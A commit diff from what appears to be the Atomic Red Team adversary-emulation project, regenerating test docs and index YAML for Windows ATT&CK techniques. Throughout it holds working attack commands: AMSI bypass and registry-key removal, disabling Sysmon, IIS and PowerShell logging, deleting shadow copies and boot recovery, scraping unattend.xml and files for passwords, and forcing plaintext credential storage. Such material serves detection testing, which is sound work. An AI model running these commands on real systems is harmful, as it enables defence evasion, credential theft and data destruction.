security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2019-12-10 18:19:40 +00:00
parent 0c5bcef840
commit fbda422009
9 changed files with 127 additions and 130 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1081/T1081.md
+6 -25
View File
@@ -14,11 +14,9 @@ In cloud environments, authenticated user credentials are often stored in local
- [Atomic Test #2 - Extract passwords with grep](#atomic-test-2---extract-passwords-with-grep)
- [Atomic Test #3 - Runs Mimikatz & Mimikittenz by name](#atomic-test-3---runs-mimikatz--mimikittenz-by-name)
- [Atomic Test #3 - Extracting passwords with findstr](#atomic-test-3---extracting-passwords-with-findstr)
- [Atomic Test #4 - Extracting passwords with findstr](#atomic-test-4---extracting-passwords-with-findstr)
- [Atomic Test #5 - Access "unattend.xml"](#atomic-test-5---access-unattendxml)
- [Atomic Test #4 - Access unattend.xml](#atomic-test-4---access-unattendxml)
<br/>
@@ -60,24 +58,7 @@ grep -ri password #{file_path}
<br/>
<br/>
## Atomic Test #3 - Runs Mimikatz & Mimikittenz by name
Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module.
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
invoke-mimikittenz
mimikatz.exe
```
<br/>
<br/>
## Atomic Test #4 - Extracting passwords with findstr
## Atomic Test #3 - Extracting passwords with findstr
Extracting Credentials from Files
**Supported Platforms:** Windows
@@ -94,7 +75,7 @@ ls -R | select-string -Pattern password
<br/>
<br/>
## Atomic Test #5 - Access "unattend.xml"
## Atomic Test #4 - Access unattend.xml
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
**Supported Platforms:** Windows
@@ -102,8 +83,8 @@ Attempts to access unattend.xml, where credentials are commonly stored, within t
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
cmd /c type C:\Windows\Panther\unattend.xml > nul 2>&1
cmd /c type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
type C:\Windows\Panther\unattend.xml > nul 2>&1
type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
```
atomics/T1086/T1086.md
-1
View File
@@ -122,7 +122,6 @@ $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfilt
## Atomic Test #5 - Invoke-AppPathBypass
Note: Windows 10 only
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
**Supported Platforms:** Windows
atomics/T1089/T1089.md
+16 -8
View File
@@ -173,7 +173,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig
<br/>
## Atomic Test #8 - Unload Sysmon Filter Driver
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
**Supported Platforms:** Windows
@@ -204,7 +204,7 @@ sc start sysmon
<br/>
## Atomic Test #9 - Disable Windows IIS HTTP Logging
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
**Supported Platforms:** Windows
@@ -215,12 +215,20 @@ This action requires HTTP logging configurations in IIS to be unlocked.
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site|
#### Run it with `command_prompt`!
#### Run it with `powershell`!
```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```
#### Commands to Check Prerequisites:
```
if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1}
```
#### Cleanup Commands:
```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
```
<br/>
<br/>
@@ -250,7 +258,7 @@ sysmon -i -accepteula
<br/>
## Atomic Test #11 - AMSI Bypass - AMSI InitFailed
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
**Supported Platforms:** Windows
@@ -272,7 +280,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key.
This test removes the Windows Defender provider registry key.
**Supported Platforms:** Windows
@@ -292,7 +300,7 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4
<br/>
## Atomic Test #13 - Disable Arbitrary Security Windows Service
With administrative rights, an adversary can disable Windows Services related to security products.
With administrative rights, an adversary can disable Windows Services related to security products.
**Supported Platforms:** Windows
@@ -319,7 +327,7 @@ net.exe start #{service_name}
<br/>
## Atomic Test #14 - Disable PowerShell Script Block Logging
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
Credit to Matt Graeber (@mattifestation) for the research.
@@ -347,7 +355,7 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging']
<br/>
## Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface
An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
Credit to Matt Graeber (@mattifestation) for the research.
atomics/T1100/T1100.md
+4
View File
@@ -31,5 +31,9 @@ xcopy #{web_shells} #{web_shell_path}
```
#### Cleanup Commands:
```
del #{web_shell_path}
```
<br/>
atomics/T1107/T1107.md
+10 -21
View File
@@ -104,14 +104,10 @@ Delete a single file from the temporary directory using cmd.exe
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-cmd\a|
#### Run it with `command_prompt`!
```
del /f #{file_to_delete}
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt
```
@@ -125,14 +121,10 @@ Recursively delete the temporary directory and all files contained within it usi
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-cmd|
#### Run it with `command_prompt`!
```
del /f /S #{folder_to_delete}
mkdir %temp%\T1107
rmdir /s /q %temp%\T1107
```
@@ -146,14 +138,10 @@ Delete a single file from the temporary directory using Powershell
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-ps\a|
#### Run it with `powershell`!
```
Remove-Item -path "#{file_to_delete}"
New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt
```
@@ -174,7 +162,8 @@ Recursively delete the temporary directory and all files contained within it usi
#### Run it with `powershell`!
```
Remove-Item -path "#{folder_to_delete}" -recurse
New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse
```
@@ -220,7 +209,7 @@ This test leverages `bcdedit` to remove boot-time recovery measures.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
@@ -232,7 +221,7 @@ bcdedit /set {default} recoveryenabled no
<br/>
## Atomic Test #11 - wbadmin
This test deletes Windows Backup catalogs.
This test deletes Windows Backup catalogs.
**Supported Platforms:** Windows
atomics/T1112/T1112.md
+10 -2
View File
@@ -29,12 +29,16 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```
#### Cleanup Commands:
```
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f
```
<br/>
<br/>
@@ -52,6 +56,10 @@ reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_
```
#### Cleanup Commands:
```
reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
```
<br/>
<br/>
@@ -124,7 +132,7 @@ reg unload "HKU\$($ProfileList[$p].SID)"
<br/>
## Atomic Test #4 - Modify registry to store logon credentials
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
**Supported Platforms:** Windows
atomics/index.md
+2 -3
View File
@@ -661,9 +661,8 @@
- [T1081 Credentials in Files](./T1081/T1081.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #3: Runs Mimikatz & Mimikittenz by name [windows]
- Atomic Test #4: Extracting passwords with findstr [windows]
- Atomic Test #5: Access "unattend.xml" [windows]
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- [T1214 Credentials in Registry](./T1214/T1214.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/index.yaml
+77 -67
View File
@@ -4992,6 +4992,9 @@ persistence:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
'
cleanup_command: 'del #{web_shell_path}
'
T1084:
technique:
@@ -7102,8 +7105,10 @@ defense-evasion:
'
- name: Unload Sysmon Filter Driver
description: "Unloads the Sysinternals Sysmon filter driver without stopping
the Sysmon service. \n"
description: 'Unloads the Sysinternals Sysmon filter driver without stopping
the Sysmon service.
'
supported_platforms:
- windows
input_arguments:
@@ -7126,9 +7131,9 @@ defense-evasion:
fltmc.exe load #{sysmon_driver}
sc start sysmon
- name: Disable Windows IIS HTTP Logging
description: "Disables HTTP logging on a Windows IIS web server as seen by Threat
Group 3390 (Bronze Union). \nThis action requires HTTP logging configurations
in IIS to be unlocked.\n"
description: |
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
supported_platforms:
- windows
input_arguments:
@@ -7137,10 +7142,18 @@ defense-evasion:
type: string
default: Default Web Site
executor:
name: command_prompt
name: powershell
prereq_command: 'if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0}
else {1}
'
command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
/section:httplogging /dontLog:true
'
cleanup_command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
/section:httplogging /dontLog:false
'
- name: Uninstall Sysmon
description: 'Uninstall Sysinternals Sysmon for Defense Evasion
@@ -7161,8 +7174,9 @@ defense-evasion:
'
- name: AMSI Bypass - AMSI InitFailed
description: "Any easy way to bypass AMSI inspection is it patch the dll in
memory setting the \"amsiInitFailed\" function to true. \nhttps://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n"
description: |
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
supported_platforms:
- windows
executor:
@@ -7171,9 +7185,9 @@ defense-evasion:
command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n"
- name: AMSI Bypass - Remove AMSI Provider Reg Key
description: "With administrative rights, an adversary can remove the AMSI Provider
registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis
test removes the Windows Defender provider registry key. \n"
description: |
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key.
supported_platforms:
- windows
executor:
@@ -7188,8 +7202,10 @@ defense-evasion:
'
- name: Disable Arbitrary Security Windows Service
description: "With administrative rights, an adversary can disable Windows Services
related to security products. \n"
description: 'With administrative rights, an adversary can disable Windows Services
related to security products.
'
supported_platforms:
- windows
input_arguments:
@@ -7207,8 +7223,10 @@ defense-evasion:
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
- name: Disable PowerShell Script Block Logging
description: "An adversary may disable PowerShell Script Block Logging to avoid
leaving evidence. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
description: |
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
- windows
executor:
@@ -7225,14 +7243,18 @@ defense-evasion:
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
- name: PowerShell Bypass of AntiMalware Scripting Interface
description: "An adversary may bypass Windows Defender AMSI to execute malicious
PowerShell code. \n\nCredit to Matt Graeber (@mattifestation) for the research.\n"
description: |
An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)'
command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)
'
T1107:
technique:
x_mitre_data_sources:
@@ -7343,17 +7365,12 @@ defense-evasion:
'
supported_platforms:
- windows
input_arguments:
file_to_delete:
description: Path of file to delete
type: Path
default: C:\Windows\Temp\victim-files-cmd\a
executor:
name: command_prompt
elevation_required: false
command: 'del /f #{file_to_delete}
'
command: |
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt
- name: Delete an entire folder - Windows cmd
description: 'Recursively delete the temporary directory and all files contained
within it using cmd.exe
@@ -7361,34 +7378,24 @@ defense-evasion:
'
supported_platforms:
- windows
input_arguments:
folder_to_delete:
description: Path of folder to delete
type: Path
default: C:\Windows\Temp\victim-files-cmd
executor:
name: command_prompt
elevation_required: false
command: 'del /f /S #{folder_to_delete}
'
command: |
mkdir %temp%\T1107
rmdir /s /q %temp%\T1107
- name: Delete a single file - Windows PowerShell
description: 'Delete a single file from the temporary directory using Powershell
'
supported_platforms:
- windows
input_arguments:
file_to_delete:
description: Path of file to delete
type: Path
default: C:\Windows\Temp\victim-files-ps\a
executor:
name: powershell
elevation_required: false
command: 'Remove-Item -path "#{file_to_delete}"
'
command: |
New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt
- name: Delete an entire folder - Windows PowerShell
description: 'Recursively delete the temporary directory and all files contained
within it using Powershell
@@ -7404,9 +7411,9 @@ defense-evasion:
executor:
name: powershell
elevation_required: false
command: 'Remove-Item -path "#{folder_to_delete}" -recurse
'
command: |
New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse
- name: Delete VSS - vssadmin
description: 'Delete all volume shadow copies with vssadmin.exe
@@ -7439,11 +7446,14 @@ defense-evasion:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
- name: wbadmin
description: "This test deletes Windows Backup catalogs. \n"
description: 'This test deletes Windows Backup catalogs.
'
supported_platforms:
- windows
executor:
@@ -9488,10 +9498,14 @@ defense-evasion:
- windows
executor:
name: command_prompt
elevation_required: false
elevation_required: true
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/t REG_DWORD /v HideFileExt /d 1 /f
'
cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/v HideFileExt /f
'
- name: Modify Registry of Local Machine - cmd
description: |
@@ -9505,6 +9519,10 @@ defense-evasion:
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
'
cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/v SecurityHealth /f
'
- name: Modify Registry of Another User Profile
description: 'Modify a registry key of each user profile not currently loaded
@@ -9570,9 +9588,10 @@ defense-evasion:
[gc]::Collect()
reg unload "HKU\$($ProfileList[$p].SID)"
- name: Modify registry to store logon credentials
description: "Sets registry key that will tell windows to store plaintext passwords
description: 'Sets registry key that will tell windows to store plaintext passwords
(making the system vulnerable to clear text / cleartext password dumping)
\n"
'
supported_platforms:
- windows
executor:
@@ -9616,7 +9635,9 @@ defense-evasion:
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
cleanup_command: 'Remove-ItemProperty -Force -Path -Path #{registry_key_storage}
-Name #{registry_entry_storage}'
-Name #{registry_entry_storage}
'
T1170:
technique:
x_mitre_data_sources:
@@ -14943,6 +14964,9 @@ privilege-escalation:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
'
cleanup_command: 'del #{web_shell_path}
'
impact:
T1531:
@@ -19261,19 +19285,6 @@ credential-access:
command: 'grep -ri password #{file_path}
'
- name: Runs Mimikatz & Mimikittenz by name
description: 'Mimikatz/kittenz - This will require a Mimikatz executable or
invoke-mimikittenz ps module.
'
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: |
invoke-mimikittenz
mimikatz.exe
- name: Extracting passwords with findstr
description: 'Extracting Credentials from Files
@@ -19286,7 +19297,7 @@ credential-access:
command: |
findstr /si pass *.xml | *.doc | *.txt | *.xls
ls -R | select-string -Pattern password
- name: Access "unattend.xml"
- name: Access unattend.xml
description: 'Attempts to access unattend.xml, where credentials are commonly
stored, within the Panther directory where installation logs are stored.
@@ -19297,8 +19308,8 @@ credential-access:
name: command_prompt
elevation_required: true
command: |
cmd /c type C:\Windows\Panther\unattend.xml > nul 2>&1
cmd /c type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
type C:\Windows\Panther\unattend.xml > nul 2>&1
type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
T1214:
technique:
x_mitre_permissions_required:
@@ -21416,7 +21427,6 @@ execution:
- name: Invoke-AppPathBypass
description: |
Note: Windows 10 only
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
supported_platforms:
- windows
atomics/windows-index.md
+2 -3
View File
@@ -473,9 +473,8 @@
- Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows]
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1081 Credentials in Files](./T1081/T1081.md)
- Atomic Test #3: Runs Mimikatz & Mimikittenz by name [windows]
- Atomic Test #4: Extracting passwords with findstr [windows]
- Atomic Test #5: Access "unattend.xml" [windows]
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- [T1214 Credentials in Registry](./T1214/T1214.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)